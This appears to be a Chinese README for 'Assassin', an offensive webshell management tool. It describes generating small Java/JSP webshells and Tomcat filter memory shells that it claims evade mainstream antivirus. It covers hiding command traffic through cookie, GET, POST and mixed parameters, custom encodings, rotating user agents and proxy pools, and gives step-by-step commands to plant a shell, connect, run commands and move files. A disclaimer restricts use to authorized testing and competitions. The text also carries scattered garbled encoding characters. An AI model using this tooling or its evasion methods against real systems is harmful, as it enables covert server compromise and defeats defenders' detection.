摘要:是一款精簡(jiǎn)的基于命令行的管理工具����,它有著多種發(fā)送方式和編碼方式,以及精簡(jiǎn)的代碼����,使得它成為隱蔽的暗殺者,難以被很好的防御�。
Assassin
Assassin是一款精簡(jiǎn)的基于命令行的webshell管理工具,它有著多種payload發(fā)送方式和編碼方式��,以及精簡(jiǎn)的payload代碼����,使得它成為隱蔽的暗殺者,難以被很好的防御�����。
自用工具開(kāi)源互相學(xué)習(xí)���,工具短小精悍��,生成的webshell能夠過(guò)目前主流殺毒軟件(36x����、騰x等,目前能過(guò)�,后面可能很快就不行了,需要稍微變換webshell代碼以再次免殺) 連接后交互的流量特征幾乎沒(méi)有��,具體payload發(fā)送方式均可自定義�。由于個(gè)人精力有限,因?yàn)閼卸也?/s>����,服務(wù)端暫時(shí)僅支持Java。
Github:https://github.com/b1ackc4t/Assassin
Gitee:https://gitee.com/b1ackc4t/Assassin
聲明:主要面向網(wǎng)絡(luò)安全人員已授權(quán)的合法滲透或?qū)W生AWD等比賽使用�����,任何人不得將其用于非法用途以及盈利等目的�,否則后果自行承擔(dān)
特點(diǎn)
[1] 生成的webshell能過(guò)主流殺軟 36x、騰x等等(以后可能就不行了����,需要稍加更改代碼,webshell模板可以自定義修改)
[2] webshell僅1kb大小�����,客戶端與服務(wù)端完成連接后發(fā)送payload十分精簡(jiǎn)
[3] payload能夠以get、post�����、cookie���、mixed四種方式發(fā)送,可動(dòng)態(tài)修改�,流量迷惑性較強(qiáng)
[4] 客戶端與服務(wù)端交互流量支持多種編碼方式,可動(dòng)態(tài)修改
[5] payload發(fā)送的參數(shù)名以及數(shù)量均可自定義�����,支持隨機(jī)ip代理和user-agent
軟件截圖
軟件類似于MSF的操作模式
發(fā)送的payload流量示例
cookie:
get:
post:
mixed:
除了cookie方式���,get�、post��、mixed可以在已經(jīng)建立連接后動(dòng)態(tài)修改發(fā)送方式�,無(wú)需更改服務(wù)端
請(qǐng)求編碼:
- base64
- base36
- hex
響應(yīng)編碼:
- base64
- raw
- base36
- hex
其中響應(yīng)的編碼方式可以動(dòng)態(tài)修改
使用教程
適用版本
服務(wù)端:jre 1.5及以上
客戶端:jdk 1.8及以上
配置文件
{ "paramNames": ["user", "file", "id", "eid", "wd", "ie", "oq", "name", "son"], // get、post�����、mixed請(qǐng)求參數(shù)名的隨機(jī)池 "cookieNames": ["fid", "uuid", "eid", "home", "ief", "fl", "oop"], // cookie請(qǐng)求參數(shù)名的隨機(jī)池 "headers":{ "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding":"gzip, deflate, br", "Accept-Language":"Accept-Language: zh-CN,zh;q=0.9", "Upgrade-Insecure-Requests": "1" }, // http頭部 "partNum": 3, // payload首次發(fā)送的分塊數(shù)量 "argNum": 5, // 每次請(qǐng)求的參數(shù)個(gè)數(shù),不能超過(guò)paramNames或者cookieNames的參數(shù)個(gè)數(shù) "startRandomUserAgent": false, // 是否隨機(jī)useragent "startIpAgents": false, // 是否開(kāi)啟ip池代理模式 "startColor": true // 是否啟用命令行顏色}
隨機(jī)useragent采用./useragents.txt里的useragent�����,開(kāi)啟后每次請(qǐng)求都會(huì)更換useragent�����,一般配合ip代理使用�����,關(guān)閉時(shí)是每次用session命令啟動(dòng)一個(gè)webshell會(huì)話一個(gè)useragent����。
ip代理池使用./ipagents.txt,格式為ip:posr;username:password����,不需要認(rèn)證的話ip:port就可以了,開(kāi)啟后每次請(qǐng)求會(huì)從中選擇一個(gè)代理���。
Tip:windows用戶啟動(dòng)后亂碼請(qǐng)關(guān)閉"startColor"���,或者使用Windows Terminal啟動(dòng)
幫助信息
所有命令使用都比較簡(jiǎn)單,可以通過(guò)help命令查看參數(shù)
help [command] 查看具體命令的幫助
實(shí)例
用startup.bat或startup.sh啟動(dòng)
new java 123 cookie# 生成密碼為123 發(fā)送方式為cookie的普通jsp木馬new java pass post reqEncode=base36 tamper=tomcat9_filter# 生成密碼為pass 發(fā)送方式為post 請(qǐng)求用base36編碼的tomcat9 filter內(nèi)存馬
Tips:add和new命令參數(shù)比較多,中括號(hào)包裹的可選參數(shù)還可以用key=value的方式賦值
之后會(huì)彈出窗口選擇保存位置
將webshell上到目標(biāo)服務(wù)器
add http://192.168.48.130:8080/1.jsp 123 java method=cookie resEncode=base36# 添加webshell 密碼123 java馬 cookie傳參 請(qǐng)求編碼默認(rèn)base64 響應(yīng)編碼base36
show查看ID號(hào)
session 1連接webshell
看到提示符發(fā)生變化就可以執(zhí)行webshell controller commands的命令了���!
Assassin|java >getshellAssassin|java|C:/apache-tomcat-9.0.54/bin >dir
上傳文件
upload # 沒(méi)參數(shù)默認(rèn)傳到當(dāng)前目錄
選擇文件即可上傳
download ./test.txt同理
編寫(xiě)webshell模板tamper
第一個(gè)部分用{@key}填充���,代表 webshell密碼
第二個(gè)部分用{@getvalue}填充,代表 獲取請(qǐng)求payload的代碼
第三個(gè)部分用{@decode}填充�����,代表 解碼代碼
模板如下:
String k="{@key}";// aes密鑰 123456 md5的前16位String r = ""; //密文payload存放位置�,這個(gè)參數(shù)名必須為r�,其他的無(wú)所謂// 取密文{@getvalue}byte[] cText = {@decode};
其他主要邏輯不改,就可以成功連接��。
實(shí)例
請(qǐng)看webshell/java/下的tomcat的filter內(nèi)存馬模板
